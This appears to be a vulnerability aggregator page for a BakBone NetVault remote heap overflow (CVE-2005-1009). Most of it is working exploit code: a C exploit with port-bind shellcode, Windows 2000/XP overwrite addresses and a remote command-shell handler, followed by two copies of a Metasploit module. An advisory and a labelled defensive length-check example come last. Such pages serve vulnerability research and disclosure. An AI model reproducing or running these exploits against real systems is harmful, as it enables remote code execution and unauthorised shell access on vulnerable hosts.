"\x00\x00\x02\x01\x00\x00\x00\x8F\xD0\xF0\xCA\x0B\x00\x00\x00\x69"
"\x3B\x62\x3B\x6F\x3B\x6F\x3B\x7A\x3B\x00\x11\x57\x3C\x42\x00\x01"
"\xB9\xF9\xA2\xC8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xA5\x97"
"\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x10"
"\x02\x4E\x3F\xAC\x14\xCC\x0A\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"
"\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00"
"\x00\x10\x02\x4E\x3F\xC0\xA8\xEA\xEB\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x01\xA5\x97\xF0\xCA\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20"
"\x00\x00\x00\x10\x02\x4E\x3F\xC2\x97\x2C\xD3\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xB9\xF9\xA2\xC8\x02\x02\x00\x00\x00\xA5\x97\xF0\xCA"
"\x05\x00\x00\x00\x6E\x33\x32\x3B\x00\x20\x00\x00\x00\x04\x02\x4E"
"\x3F\xAC\x14\xCC\x0A\xB0\xFC\xE2\x00\x00\x00\x00\x00\xEC\xFA\x8E"
"\x01\xA4\x6B\x41\x00\xE4\xFA\x8E\x01\xFF\xFF\xFF\xFF\x01\x02";
//class101 modified shellcode from metasploit.com. yummy.
char shellcode[]=
	"\x33\xC9\x83\xE9\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
	"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
	"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
	"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
	"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
	"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
	"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
	"\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
	"\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
	"\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
	"\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
	"\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
	"\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
	"\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
	"\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
	"\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
	"\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
	"\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
	"\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
	"\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
	"\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02" 
	"\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";

char jmpToXP[]="\xBD\x9B\x36\x7C"; //XP SP1
char uefOverWriteXP[]="\xB4\x73\xED\x77";//XP SP1
char jmpTo2K[]="\x7E\x6D\x03\x75";  //2k SP4
char uefOverWrite2K[]="\x4C\x14\x54\x7C";  //2K SP4

int main(int argc,char *argv[])
{     
		WSADATA wsaData;
		struct sockaddr_in targetTCP;
		int sockTCP,s;
		unsigned short port = 20031;
		long ip;
		if(argc < 3)
		{
			
			printf("Bakbone Netvault Remote Heap Overflow.\n"
				"Usage: %s [Target] [address] <port>\n"
				" eg: netvault.exe 1 127.0.0.1\n"
				"Targets\n1. Windows 2000\n2. Windows XP SP0-1\n"
					"Coded by nolimit@CiSO and BuzzDee.\n",argv[0]);
			return 1;			
		}		
		if(argc==4)
			port = atoi(argv[3]);					
        WSAStartup(0x0202, &wsaData);				
		printf("[*] Target:\t%s \tPort: %d\n\n",argv[2],port);
		ip=gimmeip(argv[2]);	
        targetTCP.sin_family = AF_INET;
        targetTCP.sin_addr.s_addr = ip;
        targetTCP.sin_port = htons(port);
		memset(buffer,'\x90',40000);
		memcpy(buffer,packet,sizeof(packet)-1); //request packet
		memcpy(buffer+32790,"\xEB\x0C",2); //JMP ahead over the 2 overwrites
		switch(atoi(argv[1]))
		{
			case 1:
			printf("Targetting 2K..\n");
			memcpy(buffer+32792,jmpTo2K,sizeof(jmpTo2K)-1); //overwrite pointer to CALL [EDI+74]
			memcpy(buffer+32796,uefOverWrite2K,sizeof(uefOverWrite2K)-1); //UEF as chosen.
			break;
			case 2:
			printf("Targetting XP..\n");
			memcpy(buffer+32792,jmpToXP,sizeof(jmpToXP)-1); //overwrite pointer to CALL [EDI+74]
			memcpy(buffer+32796,uefOverWriteXP,sizeof(uefOverWriteXP)-1); //UEF as chosen.
			break;
			default:
			printf("Error target not found.\n");
			return 1;
			break;
		}
		memcpy(buffer+32820,shellcode,sizeof(shellcode)-1); //101 portbind thx class101/metasploit ;p
		memcpy(buffer+39947,"\x00\x00\x00",3); //all done! only 39950 bytes! ;P
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		printf("[*] Socket initialized...\n");					
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 		
		printf("[*] Sending  buffer.\n");
		Sleep(1000);
		if (send(sockTCP, buffer, 39950,0) == -1)
		{
				printf("[x] Failed to inject packet! Exiting...\n");
				WSACleanup();
                return 1;
		}		
		printf("[*] Sleeping.");
		for(s=0;s<8;s++)
		{ //wait for it to catch
			printf(".");
			Sleep(500);
		}
		closesocket(sockTCP);
		for(s=0;s<5;s++)
		{
			printf(".");
			Sleep(500);
		} //exploit triggers when you reconnect sometimes
		printf("\n[*] Connecting again to trigger overflow..\n");
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{ 
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 		
		Sleep(500);
		closesocket(sockTCP);
				
		printf("[*] Connecting to host: %s on port 101\n",argv[2]);
		if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
		{
				printf("[x] Socket not initialized! Exiting...\n");
				WSACleanup();
                return 1;
		}
		targetTCP.sin_port= htons(101);
		if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
		{
			printf("[*] Connection to host failed! Exiting...\n");
			WSACleanup();
			exit(1);
		} 		
		printf("[*] Exploit worked! dropping into shell\n");
		cmdshell(sockTCP);
		WSACleanup();
		exit(1);
		return 0;
}
/*
Taken from some random exploit.
good, simple cmdshell function.
*/
void cmdshell (int sock)
{
 struct timeval tv;
 int length;
 unsigned long o[2];
 char buffer[1000];
 
 tv.tv_sec = 1;
 tv.tv_usec = 0;

 while (1) 
 {
	o[0] = 1;
	o[1] = sock;	

	length = select (0, (fd_set *)&o, NULL, NULL, &tv);
	if(length == 1)
	{
		length = recv (sock, buffer, sizeof (buffer), 0);
		if (length <= 0) 
		{
			printf ("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
		length = write (1, buffer, length);
		if (length <= 0) 
		{
			printf ("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
	}
	else
	{
    	length = read (0, buffer, sizeof (buffer));
		if (length <= 0) 
		{
			printf("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
		length = send(sock, buffer, length, 0);
		if (length <= 0) 
		{
			printf("[x] Connection closed.\n");
			WSACleanup();
			return;
		}
	}
}

}
/*********************************************************************************/
long gimmeip(char *hostname) 
{
	struct hostent *he;
	long ipaddr;
	
	if ((ipaddr = inet_addr(hostname)) < 0) 
	{
		if ((he = gethostbyname(hostname)) == NULL) 
		{
			printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
			WSACleanup();
			exit(1);
		}
		memcpy(&ipaddr, he->h_addr, he->h_length);
	}	
	return ipaddr;
}
/*********************************************************************************/

// milw0rm.com [2005-05-17]
		

- Vulnerability information (16448)

BakBone NetVault Remote Heap Overflow (EDBID:16448)
windows remote
2010-09-20 Verified
0 metasploit
N/A [Download]
##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BakBone NetVault Remote Heap Overflow',
			'Description'    => %q{
		This module exploits a heap overflow in the BakBone NetVault
	Process Manager service. This code is a direct port of the netvault.c
	code written by nolimit and BuzzDee.
			},
			'Author'         => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-1009'],
					['OSVDB', '15234'],
					['BID', '12967'],
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x20",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],
					['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],
				],

			'Privileged'     => false,
			'DisclosureDate' => 'Apr 01 2005'
			))

			register_options(
			[
				Opt::RPORT(20031)
			], self.class)
	end

	def check
		connect

		hname = "METASPLOIT"
		probe =
			"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
			"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
			"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +
			"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +
			[ hname.length + 1 ].pack('V') + hname + "\x00"
		probe += "\x00" * (201 - probe.length)

		sock.put(probe)
		res = sock.get_once(1, 10)

		off = (res || '').index("NVBuild")

		if off
			off += 21
			ver  = res[off + 4, res[off, 4].unpack('V')[0]].to_i

			if ver > 0
				print_status("Detected NetVault Build #{ver}")
				return Exploit::CheckCode::Detected
			end
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name}...")

		head =
			"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
			"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
			"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
			"\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +
			"\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +
			"\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +
			"\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +
			"\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +
			"\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +
			"\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +
			"\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

		pattern = make_nops(39947) + "\x00\x00\x00"
		p       = payload.encoded

		pattern[0, head.length]  = head
		pattern[32790, 2]        = "\xeb\x0a"
		pattern[32792, 4]        = [ target.ret ].pack('V')
		pattern[32796, 4]        = [ target['UEF'] ].pack('V')
		pattern[32800, p.length] = p

		sent = 0
		try  = 0

		15.times {
			try += 1
			connect
			sent = sock.put(pattern)
			disconnect
			break if sent == pattern.length
		}

		if (try == 15)
			print_error("Could not write full packet to server.")
			return
		end

		print_status("Overflow request sent, sleeping for four seconds (#{try} tries)")
		select(nil,nil,nil,4)

		print_status("Attempting to trigger memory overwrite by reconnecting...")

		begin
			10.times { |x|
				connect
				sock.put(pattern)
				print_status("   Completed connection #{x}")
				sock.get_once(1, 1)
				disconnect
			}
		rescue
		end

		print_status("Waiting for payload to execute...")

		handler
		disconnect
	end

	def wfs_delay
		5
	end

end

		

- Vulnerability information (F83217)

BakBone NetVault Remote Heap Overflow (PacketStormID:F83217)
2009-11-26 00:00:00
H D Moore,nolimit  metasploit.com
exploit,overflow
CVE-2005-1009

This Metasploit module exploits a heap overflow in the BakBone NetVault Process Manager service. This code is a direct port of the netvault.c code written by nolimit and BuzzDee.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'BakBone NetVault Remote Heap Overflow',
			'Description'    => %q{
		This module exploits a heap overflow in the BakBone NetVault
	Process Manager service. This code is a direct port of the netvault.c
	code written by nolimit and BuzzDee.
			},
			'Author'         => [ 'hdm', '<nolimit.bugtraq[at]ri0tnet.net>' ],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2005-1009'],
					['OSVDB', '15234'],
					['BID', '12967'],
				],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x20",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Windows 2000 SP4 English',   { 'Ret' => 0x75036d7e, 'UEF' => 0x7c54144c } ],  
					['Windows XP SP0/SP1 English', { 'Ret' => 0x7c369bbd, 'UEF' => 0x77ed73b4 } ],  
				],

			'Privileged'     => false,
			'DisclosureDate' => 'Apr 01 2005'
			))

			register_options(
			[
				Opt::RPORT(20031)
			], self.class)
	end

	def check
		connect

		hname = "METASPLOIT"
		probe = 
			"\xc9\x00\x00\x00\x01\xcb\x22\x77\xc9\x17\x00\x00\x00\x69\x3b\x69" +
			"\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69\x3b\x69" +
			"\x3b\x73\x3b\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00" +
			"\x03\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00" +
			[ hname.length + 1 ].pack('V') + hname + "\x00"
		probe += "\x00" * (201 - probe.length)

		sock.put(probe)
		res = sock.get_once(1, 10)

		off = (res || '').index("NVBuild")

		if off
			off += 21
			ver  = res[off + 4, res[off, 4].unpack('V')[0]].to_i

			if ver > 0
				print_status("Detected NetVault Build #{ver}")
				return Exploit::CheckCode::Detected
			end
		end

		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name}...")

		head = 
			"\x00\x00\x02\x01\x00\x00\x00\x8f\xd0\xf0\xca\x0b\x00\x00\x00\x69" +
			"\x3b\x62\x3b\x6f\x3b\x6f\x3b\x7a\x3b\x00\x11\x57\x3c\x42\x00\x01" +
			"\xb9\xf9\xa2\xc8\x00\x00\x00\x00\x03\x00\x00\x00\x00\x01\xa5\x97" +
			"\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x10" +
			"\x02\x4e\x3f\xac\x14\xcc\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +
			"\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00" +
			"\x00\x10\x02\x4e\x3f\xc0\xa8\xea\xeb\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x01\xa5\x97\xf0\xca\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20" +
			"\x00\x00\x00\x10\x02\x4e\x3f\xc2\x97\x2c\xd3\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
			"\x00\x00\x00\xb9\xf9\xa2\xc8\x02\x02\x00\x00\x00\xa5\x97\xf0\xca" +
			"\x05\x00\x00\x00\x6e\x33\x32\x3b\x00\x20\x00\x00\x00\x04\x02\x4e" +
			"\x3f\xac\x14\xcc\x0a\xb0\xfc\xe2\x00\x00\x00\x00\x00\xec\xfa\x8e" +
			"\x01\xa4\x6b\x41\x00\xe4\xfa\x8e\x01\xff\xff\xff\xff\x01\x02"

		pattern = make_nops(39947) + "\x00\x00\x00"
		p       = payload.encoded

		pattern[0, head.length]  = head
		pattern[32790, 2]        = "\xeb\x0a"
		pattern[32792, 4]        = [ target.ret ].pack('V')
		pattern[32796, 4]        = [ target['UEF'] ].pack('V')
		pattern[32800, p.length] = p

		sent = 0
		try  = 0

		15.times { 
			try += 1
			connect
			sent = sock.put(pattern)
			disconnect
			break if sent == pattern.length
		}

		if (try == 15)
			print_error("Could not write full packet to server.")
			return
		end

		print_status("Overflow request sent, sleeping for four seconds (#{try} tries)")
		sleep(4)

		print_status("Triggering memory overwrite by reconnecting...")

		begin
			10.times { |x|
				connect
				sock.put(pattern)
				print_status("   Completed connection #{x}")
				sock.get_once(1, 1)
				disconnect
			}
		rescue
		end

		print_status("Waiting for payload to execute...")

		handler
		disconnect	
	end

	def wfs_delay
		5
	end

end
    

- Vulnerability information

15233
BakBone NetVault configure.cfg Name= Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-04-01 Unknown
2005-04-01 Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

BakBone NetVault Remote Heap Overflow Vulnerability
Boundary Condition Error 12967
Yes No
2005-04-01 12:00:00 2009-07-12 11:56:00
Discovery is credited to Hat-Squad Security Team <bugtraq@hat-squad.com>.

- Affected software versions

BakBone NetVault 7.1
BakBone NetVault 7.0

- Discussion

NetVault is reported prone to a remote heap overflow vulnerability.

A successful attack can allow remote attackers to execute arbitrary code on a vulnerable computer to gain unauthorized access.

This issue has been confirmed in NetVault 7 packages running on Windows platforms. Other versions of NetVault running on different platforms may be affected as well.
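
The CVE description for this issue attributes the heap overflow to a modified computer name and length. The following is an added example, not NetVault code and not taken from any advisory referenced here: a C parser for a length-prefixed name field that validates the declared length before allocating and copying, using the 32-bit little-endian length plus NUL-terminated name layout seen in the module's check probe. MAX_NAME, the function names and the sample byte arrays are assumptions constructed for illustration.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define MAX_NAME 64 /* assumed policy limit for a computer name (hypothetical) */

/* Constructed sample fields: [u32 LE length][name][NUL]. */
const uint8_t GOOD[]     = {11,0,0,0,'M','E','T','A','S','P','L','O','I','T',0};
const uint8_t TOO_BIG[]  = {0,0x80,0,0,'M','E','T','A','S','P','L','O','I','T',0};
const uint8_t OVERRUN[]  = {32,0,0,0,'M','E','T','A','S','P','L','O','I','T',0};
const uint8_t EMBEDDED[] = {11,0,0,0,'M','E','T','A',0,'P','L','O','I','T',0};

/* Read a 32-bit little-endian integer (the layout pack('V') produces). */
static uint32_t rd_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Return a heap copy of the name, or NULL if the field is malformed. Caller frees. */
char *parse_name_field(const uint8_t *buf, size_t buflen)
{
    uint32_t len;
    char *name;

    if (buf == NULL || buflen < 4)
        return NULL;                 /* no room for the length prefix */
    len = rd_le32(buf);
    if (len == 0 || len > MAX_NAME)
        return NULL;                 /* declared length outside policy */
    if (len > buflen - 4)
        return NULL;                 /* declared length exceeds the bytes received */
    if (memchr(buf + 4, '\0', len) != buf + 4 + len - 1)
        return NULL;                 /* missing or embedded NUL: length and content disagree */
    name = malloc(len);              /* sized from the validated length, not a fixed guess */
    if (name == NULL)
        return NULL;
    memcpy(name, buf + 4, len);
    return name;
}

/* 1 if the field parses to exactly `expect`, else 0. */
int field_matches(const uint8_t *buf, size_t buflen, const char *expect)
{
    char *name = parse_name_field(buf, buflen);
    int ok = name != NULL && strcmp(name, expect) == 0;
    free(name);
    return ok;
}
```

Only GOOD is accepted. The other three samples are rejected before any allocation or copy takes place.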

- Exploit

An exploit targeting the application running on Windows is available (101_netvault.cpp). An exploit has also been released for the Metasploit Framework (bakbone_netvault_heap.pm).

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- References

 

 
